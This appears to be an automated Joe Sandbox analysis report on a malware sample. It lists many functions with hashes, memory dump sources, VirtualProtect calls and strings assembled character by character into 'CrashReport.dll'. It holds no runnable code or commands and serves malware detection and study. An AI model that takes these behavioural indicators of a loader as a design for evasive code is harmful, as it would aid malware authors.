Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 83dda0267fe6caebd37a7546cbe13cdd92656f67d7c5b6635a846884c4297c32
Instruction ID: 390ed91ab8c7184ca9a65bb72a4321b19e25c97645b9654796fd61a692fd19ff
Opcode Fuzzy Hash: 83dda0267fe6caebd37a7546cbe13cdd92656f67d7c5b6635a846884c4297c32
Instruction Fuzzy Hash: 4481CEB1D042289BEB248B14DC44BEAB775EF84314F1481FAD90E67340E6786EC1CB96

Function 0041E596 Relevance: 26.4, APIs: 1, Strings: 14, Instructions: 158
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15

Strings

s, xrefs: 004202BF
r, xrefs: 0042029C
c, xrefs: 004202AA
P, xrefs: 00420638
e, xrefs: 004202B1
CrashReport.dll, xrefs: 004202EF, 00420332
t, xrefs: 0042028E
=E8K, xrefs: 0041E60C
x, xrefs: 00420280
i, xrefs: 00420287
E, xrefs: 00420279
o, xrefs: 004202A3
P, xrefs: 00420295
s, xrefs: 004202B8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID: =E8K$CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
API String ID: 544645111-4241551058
Opcode ID: c4353d701fb51a2b0dffa6dd4f7b989e43846d7ef29b9452b8486dfea5942382
Instruction ID: cb0166366334f97fd20b34c2e59fcc0f862cad035518c17975269d7935fb6a3f
Opcode Fuzzy Hash: c4353d701fb51a2b0dffa6dd4f7b989e43846d7ef29b9452b8486dfea5942382
Instruction Fuzzy Hash: DD5108B1E042A49EFB20DB25DC547EAB6B5AF91304F0480FAD44C97241D67D4FC18F96

Function 0041E612 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 219memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15

Strings

s, xrefs: 004202BF
r, xrefs: 0042029C
c, xrefs: 004202AA
P, xrefs: 00420638
e, xrefs: 004202B1
CrashReport.dll, xrefs: 004202EF, 00420332
t, xrefs: 0042028E
x, xrefs: 00420280
i, xrefs: 00420287
E, xrefs: 00420279
o, xrefs: 004202A3
P, xrefs: 00420295
s, xrefs: 004202B8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
API String ID: 544645111-670065755
Opcode ID: 2ed099ac01734b5839e9fecc942af504e580af99a8cccfc6d444e26b65da47eb
Instruction ID: 29f02d2925a9bbc4b1f9ed4a27b07f14be42d4a8db89c225359a38322e303326
Opcode Fuzzy Hash: 2ed099ac01734b5839e9fecc942af504e580af99a8cccfc6d444e26b65da47eb
Instruction Fuzzy Hash: F891EEB1E052649FF720CA24DC54BEAB6B5EF94300F0480FAD84C9B281D6799FC18F96

Function 0041E8DE Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 172memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15

Strings

s, xrefs: 004202BF
r, xrefs: 0042029C
c, xrefs: 004202AA
P, xrefs: 00420638
e, xrefs: 004202B1
CrashReport.dll, xrefs: 004202EF, 00420332
t, xrefs: 0042028E
x, xrefs: 00420280
i, xrefs: 00420287
E, xrefs: 00420279
o, xrefs: 004202A3
P, xrefs: 00420295
s, xrefs: 004202B8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
API String ID: 544645111-670065755
Opcode ID: c03d5b0dc5baddca9ba271c35949d28475151da9e72dc3d2ea4d164f164e34c8
Instruction ID: 35e67c8a3b59b558272e75e3fc67bdbc3abb9c3060591f435ef62cb8cd9b40e9
Opcode Fuzzy Hash: c03d5b0dc5baddca9ba271c35949d28475151da9e72dc3d2ea4d164f164e34c8
Instruction Fuzzy Hash: 1C71E0B1E052A49EFB20CA24DC547EAB6B5EF95300F0480FAD44CA7681D67E5FC18F96

Function 0041EC2A Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 171memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15

Strings

s, xrefs: 004202BF
r, xrefs: 0042029C
c, xrefs: 004202AA
P, xrefs: 00420638
e, xrefs: 004202B1
CrashReport.dll, xrefs: 004202EF, 00420332
t, xrefs: 0042028E
x, xrefs: 00420280
i, xrefs: 00420287
E, xrefs: 00420279
o, xrefs: 004202A3
P, xrefs: 00420295
s, xrefs: 004202B8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
API String ID: 544645111-670065755
Opcode ID: 04534ad2945eb12c74019af85e0bd98c4f6d1aade11cb0dce868b4636e19a1d1
Instruction ID: 34df4aaa802723cd7e0851bb1c3307afecb9022a14f89e524a76bc45b46afdb8
Opcode Fuzzy Hash: 04534ad2945eb12c74019af85e0bd98c4f6d1aade11cb0dce868b4636e19a1d1
Instruction Fuzzy Hash: EE71E471E052A88EFB20CB25DC547EABAB1AF51304F0480EED44DA7291DA795FC08F96

Function 0041E15C Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 159memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15

Strings

s, xrefs: 004202BF
r, xrefs: 0042029C
c, xrefs: 004202AA
P, xrefs: 00420638
e, xrefs: 004202B1
CrashReport.dll, xrefs: 004202EF, 00420332
t, xrefs: 0042028E
x, xrefs: 00420280
i, xrefs: 00420287
E, xrefs: 00420279
o, xrefs: 004202A3
P, xrefs: 00420295
s, xrefs: 004202B8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
API String ID: 544645111-670065755
Opcode ID: bd841f4c8c3fa8e1de907a16782fa932cfd63a91ed947f5473c4a09782829677
Instruction ID: c348faedcfdbc602bb63cd66dbf8fa8f02ce3145a13d1d8bb1fc73d402f7a07b
Opcode Fuzzy Hash: bd841f4c8c3fa8e1de907a16782fa932cfd63a91ed947f5473c4a09782829677
Instruction Fuzzy Hash: CC510472E082A49EFB20C624DC547EAB6B5EF91300F0480FAD44C97291D67E5FC5CB96

Function 0041E5B8 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 143memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15

Strings

s, xrefs: 004202BF
r, xrefs: 0042029C
c, xrefs: 004202AA
P, xrefs: 00420638
e, xrefs: 004202B1
CrashReport.dll, xrefs: 004202EF, 00420332
t, xrefs: 0042028E
x, xrefs: 00420280
i, xrefs: 00420287
E, xrefs: 00420279
o, xrefs: 004202A3
P, xrefs: 00420295
s, xrefs: 004202B8

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
API String ID: 544645111-670065755
Opcode ID: dc877d3fe7b79a28cc3d3649662ca546d540b84c0e9bf56fb1321480ad6ef9c7
Instruction ID: b51d67149dbb00d868283c5381bebf80119ad10971e4809b2536dcf84b7e63c5
Opcode Fuzzy Hash: dc877d3fe7b79a28cc3d3649662ca546d540b84c0e9bf56fb1321480ad6ef9c7
Instruction Fuzzy Hash: DA51F3B1E042A49EFB20DB25DC547EABAB1AF51300F0480FAD44C97281D6BE4FC18B96

Function 00406844 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 54c194fb27ad8e3b78fa99a349d0b1540fb02fb75e8d0281de21f668eb8cc7be
Instruction ID: 68017a6f9b64bf2a3d55eacd7dbf14f6d757b97c8a5a38e9a7908ae6b214f9aa
Opcode Fuzzy Hash: 54c194fb27ad8e3b78fa99a349d0b1540fb02fb75e8d0281de21f668eb8cc7be
Instruction Fuzzy Hash: BE310BF1D09358AFE7109634DC919EB3B38EF82304F0581BBE846555C2D53D5E968AA3

Function 00406676 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1dda3596db6ced86365d738de9dbcbfb896c99216b314a41d822641646d6f75b
Instruction ID: 27b3d72db6d4c9e4102c49d2a0b8fdea9b1d36b5e39453587fb26ba7be69b3d3
Opcode Fuzzy Hash: 1dda3596db6ced86365d738de9dbcbfb896c99216b314a41d822641646d6f75b
Instruction Fuzzy Hash: 9B313EF1D08254AFE7109630CC556FB3B38EF82304F0581BBE44AA69C1D53D5E968B63

Function 0040666C Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b432eb99ea7be6d981de48fe8feea8b1c44bef03d4a9d04d6626f81593e97420
Instruction ID: 803b4e947b9dba8bbbfd247c9ac1351694d6b3990931f683b318e264a5286070
Opcode Fuzzy Hash: b432eb99ea7be6d981de48fe8feea8b1c44bef03d4a9d04d6626f81593e97420
Instruction Fuzzy Hash: 43314CE1D08254AFE7109630CC55BFB3B34EF82300F0581BBE44A6A9C1D13D5E968B67

Function 00406858 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b37b8ac6b1045dcc5e4679ad7b1326001a76aaec8bb1cd1f9fc2e143133f1bb9
Instruction ID: 5dfabaa0502779c9556673698f864158be9eba2c41464935b1006d9cd6714dd8
Opcode Fuzzy Hash: b37b8ac6b1045dcc5e4679ad7b1326001a76aaec8bb1cd1f9fc2e143133f1bb9
Instruction Fuzzy Hash: 2A313AF1D08354AFE3108A30DC91AFB7B34EF82304F0581BBD44A669C2D53D5E968A53

Function 00406D50 Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9f9312d4a67fe1528c836305b17c3410519b1d63c77322ba58fcea7320c02a76
Instruction ID: 3513981ace9329ce68b367b88346efa45b0adbe4d120b2e282f0555b26392776
Opcode Fuzzy Hash: 9f9312d4a67fe1528c836305b17c3410519b1d63c77322ba58fcea7320c02a76
Instruction Fuzzy Hash: CF212BF2E04114ABF3208665DC45EF77B7CEF90310F1441BBE80EA2681E53DAE958A63

Function 004068EE Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: de70f5704460281ce28e090cb355328a4a5a891dc6d1d7ba830e8a97c806e2fe
Instruction ID: c60e1b38aafd9d8b1b2b6514fe5cebb1f1484462951c490b36691157f61a7cc5
Opcode Fuzzy Hash: de70f5704460281ce28e090cb355328a4a5a891dc6d1d7ba830e8a97c806e2fe
Instruction Fuzzy Hash: 3521EAB1D0D3949FE3119B34CC959AB7B34EF82300F0981FBD445569C2D53D5A9A8B53

Function 00407420 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1c2a1999c9fd57952d49f1073d23a42f1ced81199c5832538b3697fa2647a165
Instruction ID: f0b75b4441c9d37c42d0ae9f9f43850f7ba2223918dbdec60047f74229b53538
Opcode Fuzzy Hash: 1c2a1999c9fd57952d49f1073d23a42f1ced81199c5832538b3697fa2647a165
Instruction Fuzzy Hash: 6521A8B1D0862C9BDB208A51DC91AFA7B74EB51314F1442FBD84AA6681D2396EC18F93

Function 00407150 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 051fae7594ffcc9bdc3f335987129d4eb93f07465e64b3f19de7ed127006d00b
Instruction ID: e5dd3994f6b32ac1ff6ed4b8a0999b97d5aa9ab670d0f106e4f6901be4323d05
Opcode Fuzzy Hash: 051fae7594ffcc9bdc3f335987129d4eb93f07465e64b3f19de7ed127006d00b
Instruction Fuzzy Hash: B71196B1E0921CABE7208B10CC41BEBB778EB51304F1441FBE50966680D6396EC19E53

Function 0040694C Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: be11e4526977f0b0f227e85b99da83f8957ec219c10f3e679c5ee91d3b4100c0
Instruction ID: 4925f64d2496caee3e557219cd1a7a6ec54885f7934185fd1c6884df780fe6af
Opcode Fuzzy Hash: be11e4526977f0b0f227e85b99da83f8957ec219c10f3e679c5ee91d3b4100c0
Instruction Fuzzy Hash: 10012BF1D0C314AFD3109B60CC529EB3B38DF51300F1441BFE54A66581D1396E568BA3

Function 00420172 Relevance: 1.6, APIs: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0042026E

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

